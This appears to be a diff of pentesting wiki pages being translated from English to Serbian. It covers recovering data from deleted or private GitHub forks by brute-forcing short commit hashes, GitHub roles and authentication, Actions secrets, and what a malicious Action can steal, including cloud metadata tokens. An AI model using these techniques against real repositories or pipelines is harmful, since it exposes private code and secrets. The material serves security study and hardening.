This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
Ovi načini za pristup podacima sa GitHub-a koji su navodno obrisani su [**prijavljeni u ovom blog postu**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
## Accessing Deleted Fork Data
1. You fork a public repository
2. You commit code to your fork
3. You delete your fork
1. Forkujete javni repozitorijum
2. Komitujete kod u vaš fork
3. Brišete vaš fork
> [!CAUTION]
> The data commited in the deleted fork is still accessible.
> Podaci komitovani u obrisanom forku su i dalje dostupni.
## Accessing Deleted Repo Data
1. You have a public repo on GitHub.
2. A user forks your repo.
3. You commit data after they fork it (and they never sync their fork with your updates).
4. You delete the entire repo.
1. Imate javni repozitorijum na GitHub-u.
2. Korisnik fork-uje vaš repozitorijum.
3. Komitujete podatke nakon što su fork-ovali (i nikada ne sinhronizuju svoj fork sa vašim ažuriranjima).
4. Brišete ceo repozitorijum.
> [!CAUTION]
> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
> Čak i ako ste obrisali vaš repozitorijum, sve promene napravljene na njemu su i dalje dostupne kroz forke.
## Accessing Private Repo Data
1. You create a private repo that will eventually be made public.
2. You create a private, internal version of that repo (via forking) and commit additional code for features that youre not going to make public.
3. You make your “upstream” repository public and keep your fork private.
1. Kreirate privatni repozitorijum koji će na kraju postati javan.
2. Kreirate privatnu, internu verziju tog repozitorijuma (putem forkovanja) i komitujete dodatni kod za funkcije koje nećete učiniti javnim.
3. Činite vaš “upstream” repozitorijum javnim i zadržavate vaš fork privatnim.
> [!CAUTION]
> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
> Moguće je pristupiti svim podacima koji su poslati u internu fork u vremenu između kada je interna fork kreirana i kada je javna verzija postala javna.
## How to discover commits from deleted/hidden forks
The same blog post propose 2 options:
Isti blog post predlaže 2 opcije:
### Directly accessing the commit
If the commit ID (sha-1) value is known it's possible to access it in `https://github.com/<user/org>/<repo>/commit/<commit_hash>`
Ako je poznata vrednost ID-a komita (sha-1), moguće je pristupiti mu na `https://github.com/<user/org>/<repo>/commit/<commit_hash>`
### Brute-forcing short SHA-1 values
It's the same to access both of these:
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
And the latest one use a short sha-1 that is bruteforceable.
## References
- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
{{#include ../../banners/hacktricks-training.md}}

292
src/pentesting-ci-cd/github-security/basic-github-information.md
View File

@@ -1,248 +1,242 @@
# Basic Github Information
# Osnovne informacije o Github-u
{{#include ../../banners/hacktricks-training.md}}
## Basic Structure
## Osnovna struktura
The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
Osnovna struktura github okruženja velike **kompanije** je da poseduje **preduzeće** koje poseduje **several organizacija** i svaka od njih može sadržati **several repozitorijuma** i **several timova**. Manje kompanije mogu samo **posedovati jednu organizaciju i bez preduzeća**.
From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
Sa tačke gledišta korisnika, **korisnik** može biti **član** **različitih preduzeća i organizacija**. Unutar njih korisnik može imati **različite uloge u preduzeću, organizaciji i repozitorijumu**.
Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
Štaviše, korisnik može biti **deo različitih timova** sa različitim ulogama u preduzeću, organizaciji ili repozitorijumu.
And finally **repositories may have special protection mechanisms**.
I konačno, **repozitorijumi mogu imati posebne mehanizme zaštite**.
## Privileges
## Privilegije
### Enterprise Roles
### Uloge u preduzeću
- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
- **Vlasnik preduzeća**: Osobe sa ovom ulogom mogu **upravljati administratorima, upravljati organizacijama unutar preduzeća, upravljati postavkama preduzeća, sprovoditi politiku širom organizacija**. Međutim, oni **ne mogu pristupiti postavkama organizacije ili sadržaju** osim ako nisu postavljeni za vlasnika organizacije ili im nije dat direktan pristup repozitorijumu koji poseduje organizacija.
- **Članovi preduzeća**: Članovi organizacija koje poseduje vaše preduzeće su takođe **automatski članovi preduzeća**.
### Organization Roles
### Uloge u organizaciji
In an organisation users can have different roles:
U organizaciji korisnici mogu imati različite uloge:
- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
- If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
- **Vlasnici organizacije**: Vlasnici organizacije imaju **potpun pristup administraciji vaše organizacije**. Ova uloga bi trebala biti ograničena, ali ne na manje od dve osobe, u vašoj organizaciji.
- **Članovi organizacije**: **Podrazumevana**, neadministrativna uloga za **ljude u organizaciji** je član organizacije. Po defaultu, članovi organizacije **imaju određeni broj dozvola**.
- **Menadžeri naplate**: Menadžeri naplate su korisnici koji mogu **upravljati postavkama naplate za vašu organizaciju**, kao što su informacije o plaćanju.
- **Menadžeri bezbednosti**: To je uloga koju vlasnici organizacije mogu dodeliti bilo kojem timu u organizaciji. Kada se primeni, daje svakom članu tima dozvole da **upravljaju bezbednosnim upozorenjima i postavkama širom vaše organizacije, kao i dozvole za čitanje za sve repozitorijume** u organizaciji.
- Ako vaša organizacija ima tim za bezbednost, možete koristiti ulogu menadžera bezbednosti da članovima tima date minimalan pristup koji im je potreban za organizaciju.
- **Menadžeri Github aplikacija**: Da bi omogućili dodatnim korisnicima da **upravljaju GitHub aplikacijama koje poseduje organizacija**, vlasnik može dodeliti dozvole menadžera GitHub aplikacija.
- **Spoljni saradnici**: Spoljni saradnik je osoba koja ima **pristup jednom ili više repozitorijuma organizacije, ali nije eksplicitno član** organizacije.
You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
Možete **uporediti dozvole** ovih uloga u ovoj tabeli: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
### Members Privileges
### Privilegije članova
In _https://github.com/organizations/\<org_name>/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
Na _https://github.com/organizations/\<org_name>/settings/member_privileges_ možete videti **dozvole koje korisnici imaju samo zato što su deo organizacije**.
The settings here configured will indicate the following permissions of members of the organisation:
Postavke ovde konfigurisane će ukazivati na sledeće dozvole članova organizacije:
- Be admin, writer, reader or no permission over all the organisation repos.
- If members can create private, internal or public repositories.
- If forking of repositories is possible
- If it's possible to invite outside collaborators
- If public or private sites can be published
- The permissions admins has over the repositories
- If members can create new teams
- Biti administrator, pisac, čitalac ili bez dozvole nad svim repozitorijumima organizacije.
- Da li članovi mogu kreirati privatne, interne ili javne repozitorijume.
- Da li je moguće fork-ovati repozitorijume.
- Da li je moguće pozvati spoljne saradnike.
- Da li se mogu objavljivati javne ili privatne stranice.
- Dozvole koje administratori imaju nad repozitorijumima.
- Da li članovi mogu kreirati nove timove.
### Repository Roles
### Uloge u repozitorijumu
By default repository roles are created:
Po defaultu, uloge u repozitorijumu su kreirane:
- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
- **Write**: Recommended for contributors who **actively push to your project**
- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
- **Čitanje**: Preporučuje se za **ne-kodere** koji žele da pregledaju ili diskutuju o vašem projektu.
- **Triage**: Preporučuje se za **kontributore koji treba proaktivno da upravljaju problemima i pull zahtevima** bez pristupa pisanju.
- **Pisanje**: Preporučuje se za kontributore koji **aktivno doprinose vašem projektu**.
- **Održavanje**: Preporučuje se za **menadžere projekata koji treba da upravljaju repozitorijumom** bez pristupa osetljivim ili destruktivnim radnjama.
- **Administrator**: Preporučuje se za ljude koji trebaju **potpun pristup projektu**, uključujući osetljive i destruktivne radnje kao što su upravljanje bezbednošću ili brisanje repozitorijuma.
You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
Možete **uporediti dozvole** svake uloge u ovoj tabeli [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
You can also **create your own roles** in _https://github.com/organizations/\<org_name>/settings/roles_
Takođe možete **kreirati svoje uloge** na _https://github.com/organizations/\<org_name>/settings/roles_
### Teams
### Timovi
You can **list the teams created in an organization** in _https://github.com/orgs/\<org_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
Možete **navesti timove kreirane u organizaciji** na _https://github.com/orgs/\<org_name>/teams_. Imajte na umu da da biste videli timove koji su deca drugih timova, morate pristupiti svakom roditeljskom timu.
### Users
### Korisnici
The users of an organization can be **listed** in _https://github.com/orgs/\<org_name>/people._
Korisnici organizacije mogu biti **navedeni** na _https://github.com/orgs/\<org_name>/people._
In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
U informacijama o svakom korisniku možete videti **timove čiji je korisnik član**, i **repozitorijume kojima korisnik ima pristup**.
## Github Authentication
## Github autentifikacija
Github offers different ways to authenticate to your account and perform actions on your behalf.
Github nudi različite načine za autentifikaciju na vašem nalogu i obavljanje radnji u vaše ime.
### Web Access
### Web pristup
Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
Pristupajući **github.com**, možete se prijaviti koristeći svoje **korisničko ime i lozinku** (i **2FA potencijalno**).
### **SSH Keys**
### **SSH ključevi**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
Možete konfigurisati svoj nalog sa jednim ili više javnih ključeva koji omogućavaju povezani **privatni ključ da obavlja radnje u vaše ime.** [https://github.com/settings/keys](https://github.com/settings/keys)
#### **GPG Keys**
#### **GPG ključevi**
You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
Ne **možete se pretvarati da ste korisnik sa ovim ključevima**, ali ako ih ne koristite, može biti moguće da **budete otkriveni zbog slanja commit-a bez potpisa**. Saznajte više o [vigilant mode ovde](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
### **Personal Access Tokens**
### **Lični pristupni tokeni**
You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
Možete generisati lični pristupni token da **dajte aplikaciji pristup vašem nalogu**. Kada kreirate lični pristupni token, **korisnik** treba da **navede** **dozvole** koje **token** će imati. [https://github.com/settings/tokens](https://github.com/settings/tokens)
### Oauth Applications
### Oauth aplikacije
Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
Oauth aplikacije mogu vas pitati za dozvole **da pristupe delu vaših github informacija ili da se pretvaraju da ste vi** da bi obavili neke radnje. Uobičajen primer ove funkcionalnosti je **dugme za prijavu sa github-om** koje možete pronaći na nekim platformama.
- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
- You can see third party access of applications in an **organization** in _https://github.com/organizations/\<org_name>/settings/oauth_application_policy_
- Možete **kreirati** svoje **Oauth aplikacije** na [https://github.com/settings/developers](https://github.com/settings/developers)
- Možete videti sve **Oauth aplikacije koje imaju pristup vašem nalogu** na [https://github.com/settings/applications](https://github.com/settings/applications)
- Možete videti **opsege koje Oauth aplikacije mogu tražiti** na [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
- Možete videti pristup trećih strana aplikacija u **organizaciji** na _https://github.com/organizations/\<org_name>/settings/oauth_application_policy_
Some **security recommendations**:
Neke **preporuke za bezbednost**:
- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
- **OAuth aplikacija** bi uvek trebala **delovati kao autentifikovani GitHub korisnik širom celog GitHub-a** (na primer, kada pruža obaveštenja korisnicima) i sa pristupom samo do specificiranih opsega.
- Oauth aplikacija može se koristiti kao provajder identiteta omogućavanjem "Prijava sa GitHub-om" za autentifikovanog korisnika.
- **Ne** pravite **OAuth aplikaciju** ako želite da vaša aplikacija deluje na **jednom repozitorijumu**. Sa `repo` Oauth opsegom, Oauth aplikacije mogu **delovati na \_svi\_\*\* repozitorijumima autentifikovanog korisnika\*\*.
- **Ne** pravite Oauth aplikaciju da deluje kao aplikacija za vaš **tim ili kompaniju**. Oauth aplikacije se autentifikuju kao **jedan korisnik**, tako da ako jedna osoba kreira Oauth aplikaciju za korišćenje u kompaniji, a zatim napusti kompaniju, niko drugi neće imati pristup.
- **Više** ovde [ovde](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
### Github Applications
### Github aplikacije
Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
Github aplikacije mogu tražiti dozvole da **pristupe vašim github informacijama ili da se pretvaraju da ste vi** da bi obavili specifične radnje nad specifičnim resursima. U Github aplikacijama morate navesti repozitorijume kojima će aplikacija imati pristup.
- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
- The GitHub App should **connect to a personal account or an organisation**.
- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
- You can see installed apps in an **organization** in _https://github.com/organizations/\<org_name>/settings/installations_
- Da biste instalirali GitHub aplikaciju, morate biti **vlasnik organizacije ili imati administratorske dozvole** u repozitorijumu.
- GitHub aplikacija bi trebala **biti povezana sa ličnim nalogom ili organizacijom**.
- Možete kreirati svoju GitHub aplikaciju na [https://github.com/settings/apps](https://github.com/settings/apps)
- Možete videti sve **GitHub aplikacije koje imaju pristup vašem nalogu** na [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
- Ovo su **API krajnje tačke za GitHub aplikacije** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). U zavisnosti od dozvola aplikacije, moći će da pristupi nekima od njih.
- Možete videti instalirane aplikacije u **organizaciji** na _https://github.com/organizations/\<org_name>/settings/installations_
Some security recommendations:
Neke preporuke za bezbednost:
- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
- Make sure the GitHub App integrates with **specific repositories**.
- The GitHub App should **connect to a personal account or an organisation**.
- Don't expect the GitHub App to know and do everything a user can.
- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
- GitHub aplikacija bi trebala **preduzimati radnje nezavisno od korisnika** (osim ako aplikacija koristi [token za korisnika na serveru](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests)). Da biste održali token za pristup korisnika na serveru sigurnijim, možete koristiti pristupne tokene koji će isteći nakon 8 sati, i osvežavajući token koji se može zameniti za novi pristupni token. Za više informacija, pogledajte "[Osvežavanje tokena za pristup korisnika na serveru](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
- Uverite se da se GitHub aplikacija integriše sa **specifičnim repozitorijumima**.
- GitHub aplikacija bi trebala **biti povezana sa ličnim nalogom ili organizacijom**.
- Ne očekujte da GitHub aplikacija zna i radi sve što korisnik može.
- **Ne koristite GitHub aplikaciju ako vam je potrebna samo usluga "Prijava sa GitHub-om"**. Ali GitHub aplikacija može koristiti [tok identifikacije korisnika](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) da prijavi korisnike _i_ obavi druge stvari.
- Ne pravite GitHub aplikaciju ako _samo_ želite da delujete kao GitHub korisnik i radite sve što taj korisnik može.
- Ako koristite svoju aplikaciju sa GitHub Actions i želite da modifikujete datoteke radnog toka, morate se autentifikovati u ime korisnika sa Oauth tokenom koji uključuje `workflow` opseg. Korisnik mora imati administratorske ili pisane dozvole za repozitorijum koji sadrži datoteku radnog toka. Za više informacija, pogledajte "[Razumevanje opsega za Oauth aplikacije](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
- **Više** ovde [ovde](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
### Github Actions
This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
Ovo **nije način za autentifikaciju na github-u**, ali **maliciozna** Github akcija bi mogla dobiti **neovlašćen pristup github-u** i **u zavisnosti** od **privilegija** datih akciji, moglo bi se izvršiti nekoliko **različitih napada**. Pogledajte u nastavku za više informacija.
## Git Actions
## Git akcije
Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
Git akcije omogućavaju automatizaciju **izvršavanja koda kada se dogodi događaj**. Obično je izvršeni kod **neka vrsta povezanosti sa kodom repozitorijuma** (možda izgradnja docker kontejnera ili provera da PR ne sadrži tajne).
### Configuration
### Konfiguracija
In _https://github.com/organizations/\<org_name>/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
Na _https://github.com/organizations/\<org_name>/settings/actions_ moguće je proveriti **konfiguraciju github akcija** za organizaciju.
It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
Moguće je potpuno zabraniti korišćenje github akcija, **dozvoliti sve github akcije**, ili samo dozvoliti određene akcije.
It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
Takođe je moguće konfigurisati **ko treba da odobri pokretanje Github akcije** i **dozvole GITHUB_TOKEN** Github akcije kada se pokrene.
### Git Secrets
### Git tajne
Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
Github akcije obično trebaju neku vrstu tajni da bi interagovale sa github-om ili aplikacijama trećih strana. Da bi se **izbeglo stavljanje u čistom tekstu** u repozitorijum, github omogućava da se one postave kao **Tajne**.
Ove tajne mogu biti konfigurisane **za repozitorijum ili za celu organizaciju**. Zatim, da bi **Akcija mogla da pristupi tajni**, potrebno je da je deklarisete kao:
```yaml
steps:
- name: Hello world action
with: # Set the secret as an input
super_secret:${{ secrets.SuperSecret }}
env: # Or as an environment variable
super_secret:${{ secrets.SuperSecret }}
- name: Hello world action
with: # Set the secret as an input
super_secret:${{ secrets.SuperSecret }}
env: # Or as an environment variable
super_secret:${{ secrets.SuperSecret }}
```
#### Example using Bash <a href="#example-using-bash" id="example-using-bash"></a>
#### Primer korišćenja Bash <a href="#example-using-bash" id="example-using-bash"></a>
```yaml
steps:
- shell: bash
env: SUPER_SECRET:${{ secrets.SuperSecret }}
run: |
example-command "$SUPER_SECRET"
- shell: bash
env: SUPER_SECRET:${{ secrets.SuperSecret }}
run: |
example-command "$SUPER_SECRET"
```
> [!WARNING]
> Secrets **can only be accessed from the Github Actions** that have them declared.
> Tajne informacije **mogu se pristupiti samo iz Github Actions** koje ih imaju deklarisane.
> Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
> Kada se jednom konfigurišu u repozitorijumu ili organizacijama, **korisnici github-a više neće moći da im pristupe**, samo će moći da **promene**.
Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
Dakle, **jedini način da se ukradu github tajne je da se može pristupiti mašini koja izvršava Github Action** (u toj situaciji ćete moći da pristupite samo tajnama deklarisanim za Action).
### Git Environments
Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
### Git Okruženja
Github omogućava kreiranje **okruženja** gde možete sačuvati **tajne**. Zatim, možete dati github akciji pristup tajnama unutar okruženja sa nečim poput:
```yaml
jobs:
deployment:
runs-on: ubuntu-latest
environment: env_name
deployment:
runs-on: ubuntu-latest
environment: env_name
```
You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\
It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed.
Možete konfigurisati okruženje da bude **pristupačno** **svim granama** (podrazumevano), **samo za zaštićene** grane ili **odrediti** koje grane mogu da mu pristupe.\
Takođe može postaviti **broj potrebnih pregleda** pre **izvršavanja** **akcije** koristeći **okruženje** ili **čekati** neko **vreme** pre nego što dozvoli da se implementacije nastave.
### Git Action Runner
A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.
Github akcija može biti **izvršena unutar github okruženja** ili može biti izvršena u **infrastrukturi treće strane** koju je konfigurisao korisnik.
Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**.
Nekoliko organizacija će dozvoliti pokretanje Github akcija u **infrastrukturi treće strane** jer obično bude **jeftinije**.
You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\<org_name>/settings/actions/runners_
Možete **navesti self-hosted trkače** organizacije na _https://github.com/organizations/\<org_name>/settings/actions/runners_
The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml.
Način da saznate koje **Github akcije se izvršavaju u ne-github infrastrukturi** je da pretražujete `runs-on: self-hosted` u yaml konfiguraciji Github akcije.
It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs.
**Nije moguće pokrenuti Github akciju organizacije unutar self-hosted okruženja** druge organizacije jer **se generiše jedinstveni token za trkača** prilikom njegove konfiguracije kako bi se znalo kojoj organizaciji trkač pripada.
If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with.
Ako je prilagođeni **Github trkač konfiguran na mašini unutar AWS-a ili GCP-a**, akcija **može imati pristup metapodacima** i **ukrasti token servisnog naloga** sa kojim mašina radi.
### Git Action Compromise
If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed.
Ako su sve akcije (ili zla akcija) dozvoljene, korisnik bi mogao koristiti **Github akciju** koja je **zla** i koja će **kompromitovati** **kontejner** u kojem se izvršava.
> [!CAUTION]
> A **malicious Github Action** run could be **abused** by the attacker to:
> **Zla Github akcija** može biti **zloupotrebljena** od strane napadača da:
>
> - **Steal all the secrets** the Action has access to
> - **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service)
> - **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
> - **Ukrade sve tajne** kojima akcija ima pristup
> - **Pomera se lateralno** ako se akcija izvršava unutar **infrastrukture treće strane** gde se može pristupiti SA tokenu koji se koristi za pokretanje mašine (verovatno putem usluge metapodataka)
> - **Zloupotrebi token** koji koristi **workflow** da **ukrade kod repozitorijuma** gde se akcija izvršava ili **čak da ga izmeni**.
## Branch Protections
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
Zaštite grana su dizajnirane da **ne daju potpunu kontrolu nad repozitorijumom** korisnicima. Cilj je **postaviti nekoliko metoda zaštite pre nego što se može pisati kod unutar neke grane**.
The **branch protections of a repository** can be found in _https://github.com/\<orgname>/\<reponame>/settings/branches_
**Zaštite grana repozitorijuma** mogu se naći na _https://github.com/\<orgname>/\<reponame>/settings/branches_
> [!NOTE]
> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
> **Nije moguće postaviti zaštitu grane na nivou organizacije**. Tako da sve one moraju biti deklarisane na svakom repozitorijumu.
Different protections can be applied to a branch (like to master):
Različite zaštite mogu se primeniti na granu (kao na master):
- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
- **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
- **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
- **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
- **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
- **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
- **Require signed commits**. The commits need to be signed.
- **Require linear history.** Prevent merge commits from being pushed to matching branches.
- **Include administrators**. If this isn't set, admins can bypass the restrictions.
- **Restrict who can push to matching branches**. Restrict who can send a PR.
- Možete **zahtevati PR pre spajanja** (tako da ne možete direktno spojiti kod preko grane). Ako je ovo odabrano, različite druge zaštite mogu biti na snazi:
- **Zahtevati broj odobrenja**. Veoma je uobičajeno zahtevati 1 ili 2 osobe da odobre vaš PR tako da jedan korisnik ne može direktno spojiti kod.
- **Odbaciti odobrenja kada su novi commit-i poslati**. Ako ne, korisnik može odobriti legitiman kod, a zatim dodati zli kod i spojiti ga.
- **Zahtevati preglede od vlasnika koda**. Najmanje 1 vlasnik koda repozitorijuma treba da odobri PR (tako da "slučajni" korisnici ne mogu to odobriti)
- **Ograničiti ko može odbaciti preglede pull request-a.** Možete odrediti ljude ili timove koji su dozvoljeni da odbace preglede pull request-a.
- **Dozvoliti određenim akterima da zaobiđu zahteve pull request-a**. Ovi korisnici će moći da zaobiđu prethodne restrikcije.
- **Zahtevati da status provere prođe pre spajanja.** Neke provere moraju proći pre nego što se može spojiti commit (kao što je github akcija koja proverava da li nema tajni u čistom tekstu).
- **Zahtevati rešenje razgovora pre spajanja**. Svi komentari na kod moraju biti rešeni pre nego što se PR može spojiti.
- **Zahtevati potpisane commit-e**. Commit-i moraju biti potpisani.
